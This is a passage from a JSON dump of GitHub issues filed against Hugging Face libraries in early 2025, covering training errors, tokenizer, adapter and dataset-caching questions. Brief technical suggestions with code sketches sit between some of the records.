  },
  {
    "repo": "huggingface/diffusers",
    "number": 10910,
    "title": "ValueError: Attempting to unscale FP16 gradients.",
    "body": "### Describe the bug\n\nI encountered the following error when running train_text_to_image_lora.py: ValueError: Attempting to unscale FP16 gradients.\n\nThe script I am running is as follows:\n\nexport MODEL_NAME=\"CompVis/stable-diffusion-v1-4\"\nexport DATASET_NAME=\"lambdalabs/naruto-blip-captions\"\n\naccelerate launch --mixed_precision=\"fp16\" train_text_to_image_lora.py \\\n  --pretrained_model_name_or_path=$MODEL_NAME \\\n  --dataset_name=$DATASET_NAME --caption_column=\"text\" \\\n  --resolution=512 --random_flip \\\n  --train_batch_size=1 \\\n  --num_train_epochs=100 --checkpointing_steps=5000 \\\n  --learning_rate=1e-04 --lr_scheduler=\"constant\" --lr_warmup_steps=0 \\\n  --seed=42 \\\n  --output_dir=\"sd-naruto-model-lora-clean\" \\\n  --validation_prompt=\"cute dragon creature\" --report_to=\"wandb\"\nHow can I resolve this error?\n\n### Reproduction\n\nexport MODEL_NAME=\"CompVis/stable-diffusion-v1-4\"\nexport DATASET_NAME=\"lambdalabs/naruto-blip-captions\"\n\naccelerate launch --mixed_precision=\"fp16\" train_text_to_image_lora.py \\\n  --pretrained_model_name_or_path=$MODEL_NAME \\\n  --dataset_name=$DATASET_NAME --caption_column=\"text\" \\\n  --resolution=512 --random_flip \\\n  --train_batch_size=1 \\\n  --num_train_epochs=100 --checkpointing_steps=5000 \\\n  --learning_rate=1e-04 --lr_scheduler=\"constant\" --lr_warmup_steps=0 \\\n  --seed=42 \\\n  --output_dir=\"sd-naruto-model-lora-clean\" \\\n  --validation_prompt=\"cute dragon creature\" --report_to=\"wandb\"\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nTraceback (most recent call last):\n  File \"train_text_to_image_lora.py\", line 975, in \n    main()\n  File \"train_text_to_image_lora.py\", line 856, in main\n    accelerator.clip_grad_norm_(params_to_clip, args.max_grad_norm)\n  File \"/root/miniconda3/lib/python3.8/site-packages/accelerate/accelerator.py\", line 2396, in clip_grad_norm_\n    self.unscale_gradients()\n  File \"/root/miniconda3/lib/python3.8/site-packages/accelerate/accelerator.py\", line 2340, in unscale_gradients\n    self.scaler.unscale_(opt)\n  File \"/root/miniconda3/lib/python3.8/site-packages/torch/amp/grad_scaler.py\", line 338, in unscale_\n    optimizer_state[\"found_inf_per_device\"] = self._unscale_grads_(\n  File \"/root/miniconda3/lib/python3.8/site-packages/torch/amp/grad_scaler.py\", line 260, in _unscale_grads_\n    raise ValueError(\"Attempting to unscale FP16 gradients.\")\nValueError: Attempting to unscale FP16 gradients.\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10910",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-26T14:43:57Z",
    "updated_at": "2025-03-18T17:43:08Z",
    "comments": 4,
    "user": "Messimanda"
  },
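A common cause of this exact error with `--mixed_precision="fp16"`: the trainable LoRA parameters themselves end up in fp16, and GradScaler refuses to unscale fp16 gradients. diffusers ships a helper for keeping only the trainable parameters in fp32; a sketch of applying it (where `unet` is the model with the LoRA adapter already attached):

```python
import torch
from diffusers.training_utils import cast_training_params

# keep only the trainable (LoRA) parameters in float32; the frozen base
# weights may stay in fp16
cast_training_params(unet, dtype=torch.float32)
```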
  {
    "repo": "huggingface/transformers.js",
    "number": 1209,
    "title": "Is NFD type normalizer supported?",
    "body": "### Question\n\nHi,\n\nI was trying the following code on browser which uses [dewdev/language_detection](https://huggingface.co/dewdev/language_detection):\n\n`import { pipeline, Pipeline } from '@huggingface/transformers';\n\nexport class DetectLanguage {\n    private modelid: string | null = null;\n    private detectPipeline: Pipeline | null = null;\n    private initialized: boolean = false;\n\n    constructor(modelid: string = 'dewdev/language_detection') {\n        this.modelid = modelid;\n    }\n\n    async initialize() {\n        try {\n            this.detectPipeline = await pipeline('text-classification', this.modelid, {\n                dtype: 'fp32',\n                device: navigator.gpu? 'webgpu': 'wasm'\n            });\n            this.initialized = true;\n            console.log(\"Model initialization successful.\");\n        } catch (error) {\n            console.error('Error initializing language detection model with fallback:', error);\n            this.initialized = false;\n            throw error;\n        }\n    }\n\n    async detect(text: string) {\n        if (!this.initialized || !this.detectPipeline) {\n            console.error(\"Model not initialized.\");\n            return '';\n        }\n        try {\n            const language = await this.detectPipeline(text, { top: 1 });\n            return language;\n        } catch (error) {\n            console.error('Error during language detection:', error);\n            return '';\n        }\n    }\n}\n\nasync function main() {\n    const detectLanguage = new DetectLanguage();\n    await detectLanguage.initialize();\n    const text = \"This is a test sentence.\";\n    const language = await detectLanguage.detect(text);\n    console.log(`Detected language: ${language}`);\n}\n\n// Call the main function\nmain();\n`\n\nThe above code brings up the following error:\n  Error initializing language detection model with fallback: Error: Unknown Normalizer type: NFD\n      at Normalizer.fromConfig (tokenizers.js:1011:1)\n      at tokenizers.js:1187:1\n      at Array.map ()\n      at new NormalizerSequence (tokenizers.js:1187:1)\n      at Normalizer.fromConfig (tokenizers.js:993:1)\n      at new PreTrainedTokenizer (tokenizers.js:2545:1)\n      at new BertTokenizer (tokenizers.js:3277:8)\n      at AutoTokenizer.from_pretrained (tokenizers.js:4373:1)\n      at async Promise.all (:5173/index 0)\n      at async loadItems (pipelines.js:3413:1)\n\nHere is the normalizer section from tokenizer:\n`\"normalizer\": {\n    \"type\": \"Sequence\",\n    \"normalizers\": [\n      {\n        \"type\": \"NFD\"\n      },\n      {\n        \"type\": \"BertNormalizer\",\n        \"clean_text\": true,\n        \"handle_chinese_chars\": true,\n        \"strip_accents\": true,\n        \"lowercase\": true\n      }\n    ]\n  },`\n\nMay be NFD normalizer is missing.\n\nIs there any way to bypass this error? Can you please me know?\n\nThanks",
    "url": "https://github.com/huggingface/transformers.js/issues/1209",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-26T08:48:08Z",
    "updated_at": "2025-02-26T14:41:38Z",
    "user": "adewdev"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 436,
    "title": "Why is the reward low and not increased in grpo training\uff1fHow to solve\uff1f",
    "body": "my config\n# Model arguments\nmodel_name_or_path: ../experiment/models/Qwen2.5-1.5B-Instruct\n#model_revision: main\ntorch_dtype: bfloat16\nattn_implementation: flash_attention_2\n\n# Data training arguments\ndataset_name: ../experiment/datasets/NuminaMath-TIR/data\ndataset_configs:\n- default\nsystem_prompt: \"You are a helpful AI Assistant that provides well-reasoned and detailed responses. You first think about the reasoning process as an internal monologue and then provide the user with the answer. Respond in the following format: \\n...\\n\\n\\n...\\n\"\n# Num processes is less by 1 as vLLM is using 1 GPU\nnum_processes: 3\n\n# GRPO trainer config\nbf16: true\nuse_vllm: true\nvllm_device: auto\nvllm_gpu_memory_utilization: 0.7\ndo_eval: false\ngradient_accumulation_steps: 16\ngradient_checkpointing: true\ngradient_checkpointing_kwargs:\n  use_reentrant: false\n#hub_model_id: Qwen2.5-1.5B-Open-R1-GRPO\n#hub_strategy: every_save\nlearning_rate: 2.0e-05\nlog_completions: true\nlog_level: info\nlogging_first_step: true\nlogging_steps: 5\nlogging_strategy: steps\nlr_scheduler_type: cosine\nmax_prompt_length: 512\nmax_completion_length: 1024\nmax_steps: -1\nnum_generations: 6\nnum_train_epochs: 1\noutput_dir: outputs/Qwen2.5-1.5B-Open-R1-GRPO-no-difficulty\noverwrite_output_dir: true\nper_device_eval_batch_size: 16\nper_device_train_batch_size: 8\npush_to_hub: false\nreport_to:\n- none\nreward_funcs:\n- accuracy\n- format\n#- tag_count\nreward_weights:\n- 1.0\n- 1.0\n#- 1.0\nsave_strategy: \"steps\"\nsave_steps: 100\n#save_total_limit: 1\nseed: 42\nwarmup_ratio: 0.1\n",
    "url": "https://github.com/huggingface/open-r1/issues/436",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-26T05:12:18Z",
    "updated_at": "2025-02-27T01:06:53Z",
    "user": "AXy1527"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 773,
    "title": "How to overrite the code to collect action datas from others robot\uff1f",
    "body": "Hey\uff0cI have got a problem when i try to overwrite the code of lerobot to collect action datas from my own robot. Here\u2018s the detail. My robot is a single six joint robot arm, so i make a new RobotConfig, which only contains the info of the camera. And then I overwrite the fuction 'teleop_step' in file manipulator.py. I also set a default value of the robot pos to test at first.  When i start to record,  the datad of observation and action  are fine, but when it comes to call the function 'save_eposide',  error comes up, which i show below. I reall want to know what else should i suppose to do to make it work, thanks.\n\n![Image](https://github.com/user-attachments/assets/62fdd3a3-1efc-4801-8965-faf72c0005fe)\n![Image](https://github.com/user-attachments/assets/e3780dee-0dbc-4b5d-9353-c4945579f576)\n![Image](https://github.com/user-attachments/assets/d5b3afc1-4a33-41e9-8ab7-9abee076d6e4)\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/773",
    "state": "closed",
    "labels": [
      "question",
      "stale"
    ],
    "created_at": "2025-02-26T03:33:09Z",
    "updated_at": "2025-10-16T02:28:56Z",
    "user": "tjh-flash"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 771,
    "title": "Example of training a policy with PI0?",
    "body": "is there an example config file for training a policy with PI0 policy?",
    "url": "https://github.com/huggingface/lerobot/issues/771",
    "state": "closed",
    "labels": [
      "question",
      "policies"
    ],
    "created_at": "2025-02-25T19:39:51Z",
    "updated_at": "2025-04-03T16:44:44Z",
    "user": "pqrsqwewrty"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10904,
    "title": "CLIP Score Evaluation without Pre-processing.",
    "body": "I am referring to [Evaluating Diffusion Models](https://huggingface.co/docs/diffusers/main/en/conceptual/evaluation), specifically the quantitative evaluation using CLIP score example.\n\nWe have images of shape (6, 512, 512, 3).\n\nCLIP score is calculated using `\"openai/clip-vit-base-patch16\"`. \n\nHowever, as far as I can tell, the images are not pre-processed to match the format that `\"openai/clip-vit-base-patch16\"` was trained on (e.g., images of size 224x224 pixels). \n \nShould the images have been processed before or can we still reliably use the CLIP score with the images in their original format? \n\nPlease let me know if I have overlooked or am misunderstanding something. Thanks!   \n\n\n\n\n",
    "url": "https://github.com/huggingface/diffusers/issues/10904",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-25T16:51:44Z",
    "updated_at": "2025-03-28T15:03:20Z",
    "comments": 1,
    "user": "e-delaney"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 769,
    "title": "How to convert my ALOHA hdf5 data type to your dataset format?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/769",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-02-25T14:07:13Z",
    "updated_at": "2025-10-16T02:28:58Z",
    "user": "return-sleep"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10901,
    "title": "HunyuanVIdeo in diffusers use negative_prompt but generate wrong video",
    "body": "### Describe the bug\n\nDiffusers support negative_prompt for hunyuan_video recently, but when I use negative_prompt and set **guidance_scale** and **true_cfg_scale**, I got a video with all black elements. Maybe I set wrong parameters or save video fail. \nHow can I fix my problem? Thanks\n\n### Reproduction\n\nimport torch\nimport time\nfrom diffusers import HunyuanVideoPipeline, HunyuanVideoTransformer3DModel, AutoencoderKLHunyuanVideo\nfrom diffusers.utils import export_to_video, load_image, load_video\nNEGATIVE_PROMPT = \"Aerial view, aerial view, overexposed, low quality, deformation, a poor composition, bad hands, bad teeth, bad eyes, bad limbs, distortion\"\nmodel_path = \"/realpath/hunyuanvideo-community-HunyuanVideo\"\npipe = HunyuanVideoPipeline.from_pretrained(model_path, torch_dtype=torch.float16)\npipe.vae.enable_tiling()\npipe.to(\"cuda\")\noutput = pipe(\n    prompt=\"The video shows a man and a woman standing in the snow, wearing winter clothing and holding cups of coffee. \", \n    negative_prompt=NEGATIVE_PROMPT,\n    height=480,\n    width=720,\n    num_frames=129,\n    num_inference_steps=10,\n    true_cfg_scale=6.0,\n    guidance_scale=1.0,\n).frames[0]\nexport_to_video(output, \"diffusers_480p_output.mp4\", fps=24)\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nH20 \nresolution = 480 * 720\nsteps=10\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/10901",
    "state": "open",
    "labels": [
      "bug",
      "stale"
    ],
    "created_at": "2025-02-25T11:08:43Z",
    "updated_at": "2025-07-15T07:19:15Z",
    "comments": 2,
    "user": "philipwan"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2200,
    "title": "Bug exporting Whisper?",
    "body": "### System Info\n\nHi! I'm exporting some fine-tuned whisper models, small and base, being fine-tuned in english or spanish. In some cases I've detected that the tokenizer.json is 2.423KB and in other cases 3.839, being the tokenizer.json exported for the same language. I have some models in english where the tokenizer weight's 2.423KB and others where the tokenizer weight's 3.839KB, and same for the spanish ones. \n\nWhen the tokenizer is 2.423KBs I get problems generating the output, as it reachs the max_lenght of the model, but when the tokenizer file is 3.839KBs, the output gets as it should. \n\nThe tokenizer from the original models weights 2.423KBs, and I they works well, but when finetuned the weight change. I don't know if this is an expected output,\n\n\n### Who can help?\n\n@michaelbenayoun @JingyaHuang @echarlaix\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nI have used the following URL to train my models: https://huggingface.co/blog/fine-tune-whisper\n\nThe datasets I have used in spanish are: \n\n```py\nvoxpopuli_spanish = load_dataset(\n      \"facebook/voxpopuli\", \"es\", split=\"train\", streaming=True, trust_remote_code=True\n  ) # I take 133 random instances\ncommon_voice_spanish = load_dataset(\n    \"mozilla-foundation/common_voice_17_0\",\n    \"es\",\n    split=\"train\",\n    streaming=True,\n    trust_remote_code=True,\n) # I take 66 random instances\nlibrispeech_spanish = load_dataset(\n    \"facebook/multilingual_librispeech\", \"spanish\", split=\"train\", streaming=True\n) # I take 66 random instances\n```\nI have used the same datasets for english:\nIn case of the common_voice and voxpopuli, I just change \"es\"for \"en\". For the librispeech:\n\n```py\nlibrispeech_asr = load_dataset(\n    \"openslr/librispeech_asr\", split=\"train.other.500\", streaming=True, trust_remote_code=True\n)\n```\n\nI use other private dataset that I can't share right now, but they are around 200 instances.\n\nFor exporting the model I use the following line: \n\n```\noptimum-cli export onnx --model whisper-small-es-trained whisper-small-es-onnx --task automatic-speech-recognition --opset 18\n```\nI have tested using multiple opsets, but I get the same output.\n\n### Expected behavior\n\nI don't know if the behavior is the correct one, or I the exported tokenizer.json must be always the same.",
    "url": "https://github.com/huggingface/optimum/issues/2200",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-02-25T09:45:02Z",
    "updated_at": "2025-03-05T20:58:30Z",
    "comments": 1,
    "user": "AlArgente"
  },
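Before digging into the export itself, it may help to localize what the two tokenizer.json sizes actually differ in. A small diff sketch (file paths are hypothetical):

```python
import json

# Hypothetical paths: one small (2,423 KB) and one large (3,839 KB) exported tokenizer.
with open("whisper-small-es-small/tokenizer.json") as f:
    small = json.load(f)
with open("whisper-small-es-large/tokenizer.json") as f:
    large = json.load(f)

# Compare top-level sections to see where the extra ~1.4 MB lives.
for key in sorted(set(small) | set(large)):
    status = "identical" if small.get(key) == large.get(key) else "differs"
    print(f"{key}: {status}")
```

If `added_tokens` or `model` differs, the fine-tuning run likely saved the tokenizer with a different set of special tokens, which could also explain generation running to max_length when the EOS token no longer matches.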
  {
    "repo": "huggingface/diffusers",
    "number": 10899,
    "title": "Whether lohaconfig is supported in the convert_state_dict_to_diffusers method",
    "body": "In the train_text_to_image_lora.py file\n\nunet_lora_config = LoraConfig(\n        r=cfg.rank,\n        lora_alpha=cfg.rank,\n        init_lora_weights=\"gaussian\",\n        target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\n    )\n modified to \n\nunet_lora_config = LoHaConfig(\n        r=cfg.rank,\n        alpha=cfg.rank,\n        target_modules=[\"to_k\", \"to_q\", \"to_v\", \"to_out.0\"],\n    ), \n\n\nunet_lora_state_dict = convert_state_dict_to_diffusers(\n                            get_peft_model_state_dict(unwrapped_unet)\n                        )\nin this line, an error will occur. Please tell me how to modify it.",
    "url": "https://github.com/huggingface/diffusers/issues/10899",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-25T08:39:08Z",
    "updated_at": "2025-03-27T15:03:17Z",
    "comments": 2,
    "user": "llm8047"
  },
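The error above is plausibly a key-naming mismatch rather than a training problem: `convert_state_dict_to_diffusers` remaps LoRA-style `lora_A`/`lora_B` keys, while LoHa adapters emit `hada_*` keys. A toy sketch to see the key names LoHa actually produces (the tiny module is illustrative, not the UNet):

```python
import torch.nn as nn
from peft import LoHaConfig, get_peft_model, get_peft_model_state_dict

# Stand-in module; "0" is the Linear layer's name inside the Sequential.
base = nn.Sequential(nn.Linear(16, 16))
model = get_peft_model(base, LoHaConfig(r=4, alpha=4, target_modules=["0"]))

# Keys look like "...hada_w1_a" / "...hada_w2_b", not "...lora_A" / "...lora_B",
# which is why the LoRA-oriented conversion helper falls over.
print(sorted(get_peft_model_state_dict(model)))
```

One hedged workaround is to save and reload the raw PEFT state dict directly instead of converting it to the diffusers layout.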
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3246,
    "title": "How to save the merged model trained with peft?",
    "body": "I am working on fine tuning a 7B model and due to the size, we trained it with lora- by following the guidance (https://sbert.net/examples/training/peft/README.html)\n```python\npeft_config = LoraConfig(\n        task_type=TaskType.FEATURE_EXTRACTION,\n        inference_mode=False,\n        r=8,\n        lora_alpha=32,\n        lora_dropout=0.1,\n    )\n\nmodel.add_adapter(peft_config)\n```\n\nTraining works great and we are looking for some guidances to merge the lora layer with the base model and saved.\n\nWhat we have tried:\n1. `model.save_pretrained(\"\")` => only save the lora layer\n2. using `peft` library: this doesn't seem to work correctly, as the inference result is the same as the base model.\n```\nmodel.save_pretrained(tmp_path)\nbase_model = SentenceTransformer(model_name_or_path=model_path)\nadapter_model = PeftModel.from_pretrained(base_model, adapter_tmp_path)\nmerged_model = adapter_model.merge_and_unload()\nmerged_model.config = transformers.AutoConfig.from_pretrained(model_path)\nmerged_model.save_pretrained(path)\n```\n\nWe are reaching out for insights about how to merge the sentence transformer trained peft model with the base model. Thanks!",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3246",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-25T00:56:20Z",
    "updated_at": "2025-12-05T12:33:48Z",
    "user": "chz816"
  },
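One pattern that may work for the merge question above: apply the adapter to the underlying transformers module rather than the SentenceTransformer wrapper, merge there, and put the merged module back. A sketch under that assumption (all paths are placeholders):

```python
from peft import PeftModel
from sentence_transformers import SentenceTransformer

base = SentenceTransformer("path/to/base-7b-model")
# base[0] is the Transformer module; .auto_model is the raw transformers model.
wrapped = PeftModel.from_pretrained(base[0].auto_model, "path/to/saved-adapter")
base[0].auto_model = wrapped.merge_and_unload()  # fold LoRA deltas into the weights
base.save_pretrained("path/to/merged-model")     # plain model, no adapter needed
```

The earlier attempt likely failed because `merge_and_unload` was applied to the whole `SentenceTransformer`, where the adapter layers do not live at the module paths peft expects.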
  {
    "repo": "huggingface/datasets",
    "number": 7420,
    "title": "better correspondence between cached and saved datasets created using from_generator",
    "body": "### Feature request\n\nAt the moment `.from_generator` can only create a dataset that lives in the cache. The cached dataset cannot be loaded with `load_from_disk` because the cache folder is missing `state.json`. So the only way to convert this cached dataset to a regular is to use `save_to_disk` which needs to create a copy of the cached dataset. For large datasets this can end up wasting a lot of space. In my case the saving operation failed so I am stuck with a large cached dataset and no clear way to convert to a `Dataset` that I can use. The requested feature is to provide a way to be able to load a cached dataset using `.load_from_disk`. Alternatively `.from_generator` can create the dataset at a specified location so that it can be loaded from there with `.load_from_disk`.\n\n### Motivation\n\nI have the following workflow which has exposed some awkwardness about the Datasets saving/caching.\n\n1. I created a cached dataset using `.from_generator` which was cached in a folder. This dataset is rather large (~600GB) with many shards.\n2. I tried to save this dataset using `.save_to_disk` to another location so that I can use later as a `Dataset`. This essentially creates another copy (for a total of 1.2TB!) of what is already in the cache... In my case the saving operation keeps dying for some reason and I am stuck with a cached dataset and no copy.\n3. Now I am trying to \"save\" the existing cached dataset but it is not clear how to access the cached files after `.from_generator` has finished e.g. from a different process. I should not be even looking at the cache but I really do not want to waste another 2hr to generate the set so that if fails agains (I already did this couple of times). \n- I tried `.load_from_disk` but it does not work with cached files and complains that this is not a `Dataset` (!).\n- I looked at `.from_file` which takes one file but the cached file has many (shards) so I am not sure how to make this work. \n- I tried `.load_dataset` but this seems to either try to \"download\" a copy (of a file which is already in the local file system!) which I will then need to save or I need to use `streaming=False` to create an `IterableDataset `which then I need to convert (using the cache) to `Dataset` so that I can save it. With both options I  will end up with 3 copies of the same dataset for a total of ~2TB! I am hoping here is another way to do this...\n\nMaybe I am missing something here: I looked at docs and forums but no luck. I have a bunch of arrow files cached by `Dataset.from_generator` and no clean way to make them into a `Dataset` that I can use. \n\nThis all could be so much easer if `load_from_disk` can recognize the cached files and produce a `Dataset`: after the cache is created I would not have to \"save\" it again and I can just load it when I need.  At the moment `load_from_disk` needs `state.json` which is lacking in the cache folder. So perhaps `.from_generator` could be made to \"finalize\" (e.g. create `state.json`) the dataset once it is done so that it can be loaded easily. Or provide `.from_generator` with a `save_to_dir` parameter in addition to `cache_dir` which can be used for the whole process including creating the `state.json` at the end. \n\nAs a proof of concept I just created `state.json` by hand and `load_from_disk` worked using the cache! So it seems to be the missing piece here.\n\n### Your contribution\n\nTime permitting I can look into `.from_generator` to see if adding  `state.json` is feasible.",
    "url": "https://github.com/huggingface/datasets/issues/7420",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-02-24T22:14:37Z",
    "updated_at": "2026-01-05T15:16:35Z",
    "comments": 3,
    "user": "vttrifonov"
  },
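As a stopgap for the issue above that avoids both re-generating and hand-writing `state.json`, the cached arrow shards can plausibly be reassembled directly (the cache path is illustrative):

```python
import glob
import os
from datasets import Dataset, concatenate_datasets

# Illustrative location: point the glob at the shards from_generator produced.
cache_dir = os.path.expanduser("~/.cache/huggingface/datasets/generator")
shards = sorted(glob.glob(os.path.join(cache_dir, "**", "*.arrow"), recursive=True))

ds = concatenate_datasets([Dataset.from_file(p) for p in shards])
ds.save_to_disk("/data/my_dataset")  # or skip this and use `ds` directly
```

Since `Dataset.from_file` memory-maps each shard, using `ds` in place avoids the extra on-disk copy that `save_to_disk` creates.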
  {
    "repo": "huggingface/open-r1",
    "number": 413,
    "title": "How many resources are required to train deepseek r1 671b using grpo?",
    "body": ".",
    "url": "https://github.com/huggingface/open-r1/issues/413",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-24T11:55:12Z",
    "updated_at": "2025-02-24T11:55:12Z",
    "user": "LiuShixing"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 577,
    "title": "Could I get safe tensor without lazy loading?",
    "body": "### System Info\n\nI see safe_open and deserialize, it seems that both two are lazy loading.\nSo if I don't want to load safetensor without lazy loading\nhow could I do, thanks\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Reproduction\n\nI use sglang, and in sglang model_loader/weight_utils.py\nit load safetensors like this\n`if not is_all_weights_sharded:\n            with safe_open(st_file, framework=\"pt\") as f:\n                for name in f.keys():  # noqa: SIM118\n                    param = f.get_tensor(name)\n                    yield name, param\n        else:\n            result = load_file(st_file, device=\"cpu\")\n            for name, param in result.items():\n                yield name, param\n`\nI found it loads safe tensor too slow(about 20min+), whether is_all_weights_sharded is True\nand if I prefetch safetensors before load_model(like cat * > /dev/null), it could only cost 5min\nI try to use threadExecutor to parallel this code, and although get_tensor could be quick, but loading weight still cost 20min +, so I doubt that lazy loading.thanks\n\n### Expected behavior\n\nwithout lazy loading",
    "url": "https://github.com/huggingface/safetensors/issues/577",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-24T07:55:33Z",
    "updated_at": "2025-03-13T16:51:49Z",
    "comments": 1,
    "user": "voidxb"
  },
  {
    "repo": "huggingface/trl",
    "number": 2941,
    "title": "How to dynamically adjust params during grpo training?",
    "body": "How to dynamically adjust params during training? For example, I want to adopt a smaller num_generations(8) at the beginning of grpo training, and enlarge it to 32 and also adopt a larger temperature from the 50th step.",
    "url": "https://github.com/huggingface/trl/issues/2941",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-24T02:08:52Z",
    "updated_at": "2025-02-24T07:49:10Z",
    "user": "Tomsawyerhu"
  },
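A hedged sketch for the scheduling question above, using a standard transformers callback. Whether GRPOTrainer picks up `num_generations`/`temperature` changes mid-run depends on the TRL version (some values may be cached at init), so this needs verification:

```python
from transformers import TrainerCallback

class GenerationSchedule(TrainerCallback):
    # Assumption: GRPOTrainer re-reads these fields from its args each step;
    # verify against the TRL version in use before relying on it.
    def on_step_begin(self, args, state, control, **kwargs):
        if state.global_step == 50:
            args.num_generations = 32
            args.temperature = 1.0

# trainer = GRPOTrainer(..., args=grpo_config, callbacks=[GenerationSchedule()])
```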
  {
    "repo": "huggingface/open-r1",
    "number": 406,
    "title": "How many GPU hours you take to train a simple model?",
    "body": "I wonder how many hours you take to use this repo to train a simple model, like DeepSeek-R1-Distill-Qwen-1.5B or DeepSeek-R1-Distill-Qwen-7B, if on 8 H100?",
    "url": "https://github.com/huggingface/open-r1/issues/406",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-24T00:27:52Z",
    "updated_at": "2025-02-24T06:31:31Z",
    "user": "Red-Scarff"
  },
  {
    "repo": "huggingface/safetensors",
    "number": 576,
    "title": "How to access header with python",
    "body": "Is there a way to access the header in Python to know the offsets of each tensor data?",
    "url": "https://github.com/huggingface/safetensors/issues/576",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-23T17:42:46Z",
    "updated_at": "2025-03-13T16:58:36Z",
    "user": "justinchuby"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10878,
    "title": "How to expand peft.LoraConfig",
    "body": "If expanding\npeft.LoraConfig\uff0c How to modify to accommodate more lora?",
    "url": "https://github.com/huggingface/diffusers/issues/10878",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-23T14:01:11Z",
    "updated_at": "2025-03-25T15:03:28Z",
    "user": "llm8047"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10874,
    "title": "Does it support adding LoHa method",
    "body": "Does it support adding LoHa method\uff1f\n\nWhere can I modify it\uff1f",
    "url": "https://github.com/huggingface/diffusers/issues/10874",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-23T12:06:14Z",
    "updated_at": "2025-03-25T15:03:41Z",
    "comments": 3,
    "user": "llm8047"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10872,
    "title": "[Feature request] Please add from_single_file support in SanaTransformer2DModel to support first Sana Apache licensed model",
    "body": "**Is your feature request related to a problem? Please describe.**\nWe all know Sana model is very good but unfortunately the LICENSE is restrictive.\nRecently a Sana finetuned model is released under Apache LICENSE. Unfortunately SanaTransformer2DModel does not support from_single_file to use it\n\n**Describe the solution you'd like.**\n\n```python\nimport torch\nfrom diffusers import SanaPipeline\nfrom diffusers import SanaTransformer2DModel\nmodel_path = \"Efficient-Large-Model/Sana_1600M_1024px_MultiLing\"\ndtype = torch.float16\ntransformer = SanaTransformer2DModel.from_single_file (\n\t\"Swarmeta-AI/Twig-v0-alpha/Twig-v0-alpha-1.6B-2048x-fp16.pth\",\n\ttorch_dtype=dtype,\n)\npipe = SanaPipeline.from_pretrained(\n\tpretrained_model_name_or_path=model_path,\n\ttransformer=transformer,\n\ttorch_dtype=dtype,\n\tuse_safetensors=True,\n)\npipe.to(\"cuda\")\npipe.enable_model_cpu_offload()\npipe.enable_vae_slicing()\npipe.enable_vae_tiling()\ninference_params = {\n\t\"prompt\": \"rose flower\",\n\t\"negative_prompt\": \"\",\n\t\"height\": 1024,\n\t\"width\": 1024,\n\t\"guidance_scale\": 4.0,\n\t\"num_inference_steps\": 20,\n\n}\nimage = pipe(**inference_params).images[0]\nimage.save(\"sana.png\")\n\n```\n\n```\n(venv) C:\\aiOWN\\diffuser_webui>python sana_apache.py\nTraceback (most recent call last):\n  File \"C:\\aiOWN\\diffuser_webui\\sana_apache.py\", line 6, in \n    transformer = SanaTransformer2DModel.from_single_file (\nAttributeError: type object 'SanaTransformer2DModel' has no attribute 'from_single_file'\n\n```\n\n**Describe alternatives you've considered.**\nNo alternatives available as far as I know\n\n**Additional context.**\nN.A.\n",
    "url": "https://github.com/huggingface/diffusers/issues/10872",
    "state": "closed",
    "labels": [
      "help wanted",
      "Good second issue",
      "contributions-welcome",
      "roadmap"
    ],
    "created_at": "2025-02-23T11:36:21Z",
    "updated_at": "2025-03-10T03:08:32Z",
    "comments": 5,
    "user": "nitinmukesh"
  },
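Until `from_single_file` support lands, a heavily hedged workaround sketch: build the transformer from the diffusers-format base repo, then overwrite its weights from the `.pth` file. This assumes the base repo has a `transformer` subfolder and that the `.pth` keys roughly match the diffusers layout (they may not, so inspect what fails to load):

```python
import torch
from diffusers import SanaTransformer2DModel

transformer = SanaTransformer2DModel.from_pretrained(
    "Efficient-Large-Model/Sana_1600M_1024px_MultiLing",  # base repo from the issue
    subfolder="transformer",
    torch_dtype=torch.float16,
)
state_dict = torch.load("Twig-v0-alpha-1.6B-2048x-fp16.pth", map_location="cpu")
# Some .pth checkpoints nest the weights under a "state_dict" key.
state_dict = state_dict.get("state_dict", state_dict)
missing, unexpected = transformer.load_state_dict(state_dict, strict=False)
print(f"missing: {len(missing)}, unexpected: {len(unexpected)}")  # nonzero means keys need remapping
```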
  {
    "repo": "huggingface/lerobot",
